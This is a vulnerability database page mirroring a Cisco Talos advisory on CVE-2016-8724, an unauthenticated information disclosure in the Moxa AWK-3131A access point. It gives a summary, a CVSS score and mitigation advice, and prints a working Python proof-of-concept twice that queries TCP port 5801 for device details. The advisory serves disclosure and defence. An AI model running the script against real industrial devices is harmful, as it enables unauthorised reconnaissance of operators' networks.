Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:96534
HistorySep 19, 2017 - 12:00 a.m.

Moxa AWK-3131A serviceAgent Information Disclosure Vulnerability(CVE-2016-8724)

2017-09-1900:00:00
Root
www.seebug.org
32

EPSS

0.001

Percentile

47.7%

JSON

Summary

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Details

An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information, such as firmware version.

The functionality exposed by serviceAgent is accessible by using a freely-available Windows application (Moxa Windows Search Utility) or with custom scripts. In addition, the service does not use authentication and the protocol communicates in cleartext.

Exploit Proof-of-Concept

The below Python script, using a payload pulled from traffic generated by the Moxa Windows Search Utility application, will retrieve information from a target device that may be of value to an attacker .

#!/usr/bin/python

import socket

host = '<device IP>'
port = 5801

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))
s.send(
"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x0c\x29\xd3\xe0\x26\x00\x90\xe8\x57\x23\x07" +
"\x00\x00\x00\x05\x00\x02\x00\x06\x00\x18\x00\x00\x00\x00")

print s.recv(1024)

s.close()

Mitigation

It does not appear possible to disable serviceAgent using legitimately accessible functionality. In addition, the service does not require authentication and transmits information in cleartext. Blocking this service from communicating across network boundaries will mitigate some of the risk associated with this vulnerability.

Timeline

  • 2016-11-18 - Vendor Disclosure
  • 2017-04-10 - Public Release

CREDIT

  • Discovered by Patrick DeSantis of Cisco Talos.

                                                #!/usr/bin/python

import socket

host = '<device IP>'
port = 5801

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))
s.send(
"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x0c\x29\xd3\xe0\x26\x00\x90\xe8\x57\x23\x07" +
"\x00\x00\x00\x05\x00\x02\x00\x06\x00\x18\x00\x00\x00\x00")

print s.recv(1024)

s.close()

Related

nessus 1
talos 1
openvas 1
cve 1
cvelist 1
nvd 1
prion 1
nessus
nessus
Moxa AWK-3131A serviceAgent Information Disclosure (CVE-2016-8724)
2023-08-02 00:00:00
talos
talos
Moxa AWK-3131A serviceAgent Information Disclosure Vulnerability
2017-04-10 00:00:00
openvas
openvas
Moxa AWK Series serviceAgent Information Disclosure Vulnerability
2017-04-11 00:00:00
cve
cve
CVE-2016-8724
2017-04-13 19:59:00
cvelist
cvelist
CVE-2016-8724
2017-04-13 19:00:00
nvd
nvd
CVE-2016-8724
2017-04-13 19:59:00
prion
prion
Information disclosure
2017-04-13 19:59:00

EPSS

0.001

Percentile

47.7%

JSON
Related for SSV:96534
nessus1talos1openvas1cve1cvelist1nvd1prion1